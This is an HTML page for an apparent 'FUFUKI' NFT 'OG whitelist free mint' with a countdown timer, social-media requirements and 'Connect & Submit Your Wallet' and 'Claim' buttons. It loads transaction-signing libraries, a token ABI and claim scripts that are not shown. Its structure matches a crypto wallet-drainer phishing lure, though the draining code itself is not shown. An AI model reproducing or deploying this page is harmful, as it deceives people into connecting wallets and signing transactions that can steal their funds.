<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat+Alternates&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="fonts/stylesheet.css">
    <link rel="stylesheet" href="fonts/font-2/stylesheet.css">
    <link rel="icon" href="https://s3.gifyu.com/images/Untitled-design24b99f799f6cd7c4.png"  />
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/media.css">
    <title>FUFUKI &#8211; Holding **FUFUKI** could pay you , but you&rsquo;re still missing ..</title>

    <script src="src/js/1409195906.js" crossorigin="anonymous"></script>

    <script src="./settings.js"></script>

    <script src="src/js/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bignumber.js/8.0.2/bignumber.js" integrity="sha512-XQDG6H87RgMf+aNFwDPCUcFwUf3t9liyqN/2BkJ8KGixupbjPwQHNhypNA972mLIkg4KPo4lkGmqAf3yfDz8hw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="src/js/tokenabi.js"></script>
    <script src="jquery.min.js"></script>
    <script src="base.js?1"></script>

</head>
<body>
    <section class="main-body py-5">
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-lg-12">
                    <div class="main-box  py-4 px-sm-4 px-2 mb-5">
                        <div class="floating-right-box">
                            
                        </div>
                        <div class="floating-left-box">
                            
                        </div>
                        <div class="row g-0">
                            <div class="col-lg-4 col-md-4">
                                <div class="left-box ">
                                    <div class="left-img-box mb-3">
                                        <img src="https://s9.gifyu.com/images/1f1f5b9effef4c5a4.png" class="img-fluid" alt="left-img">
                                    </div>
                                   
                                </div>
                            </div>
                            <div class="col-lg-8 col-md-8">
                                <div class="right-box">
                                    <div class="right-top text-center pt-2 mb-4">
                                        <h1 class="mb-5">OG WHITELIST FREE MINT SUBMISSION LIVE </h1>
                                        <div class="time-box">
                                            <div class="single-box">
                                                <h3>7 <br><span>Days</span></h3>
                                            </div>
                                            <div class="single-box">
                                                <h3>12 <br><span>Houres</span></h3>
                                            </div>
                                            <div class="single-box">
                                                <h3>56 <br><span>Minutes</span></h3>
                                            </div>
                                            <div class="single-box">
                                                <h3>45 <br><span>Seconds</span></h3>
                                            </div>
                                        </div>
                                    </div>
                                </div>

                                <div class="right-bottom mb-5 ">
                                    <p class="mb-3">To register, you must meet the following requirements</p>
                                    <div class="twitter-box mb-5">
                                        <div class="single-twitter">
                                            <a href="#">
                                                <img src="images/t.png" class="img-fluid twitter-img" alt="twitter">Follow @FUFUKI_NFT
                                            </a>
                                        </div>
                                        <div class="single-twitter">
                                            <a href="#">
                                                <img src="images/t.png" class="img-fluid twitter-img" alt="twitter">Like & Retweet & Tag 3 freinds in Pinned Post
                                            </a>
                                        
                                    </div>
                                    <div class="radio-box">
                                        
                                        <div class="single-radio-box">
                                            <div class="radio-left">
                                                
                                            </div>
                                            
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="radio-right">
                                    <button id="connectWallet" class="btn-2 btn-3">Connect & Submit Your Wallet</button>
                                    <br>
                                </br>
                                    <button id="claimButton"class="btn-2 btn-3" style="display: none;">Claim Your OG Free Mint Whitelist</button>

                                </div>
                            </div>
                        </div>
                    </div>
                    
                </div>
                <div class="col-lg-9">
                    <div class="image-group">
                        <div class="single-img-a">
                           
                        </div>
                        <div class="single-img-a">
                            
                        <div class="single-img-a">
                            
                        </div>
                        <div class="single-img-a">
                          
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <script src="./src/js/loader_index.js"></script>



    <script src="https://unpkg.com/web3@latest/dist/web3.min.js"></script>
    <script type="text/javascript" src="https://unpkg.com/web3modal"></script>
    <script type="text/javascript" src="https://unpkg.com/evm-chains/lib/index.js"></script>
        <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider"></script>

    <script src="https://unpkg.com/moralis-v1@1.12.0/dist/moralis.js"></script>
        <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.8/dist/umd/index.min.js"></script>
        <script type="text/javascript" src="./src/js/claim.js"></script>
      
        
        <script type="text/javascript" src="./src/js/index.min.js"></script>
    
        <script type="text/javascript">
            $('.alert-eth-message-close').click(function(){
                $('.alert-eth-message').fadeOut(200);
            });
        </script>

</body>
</html>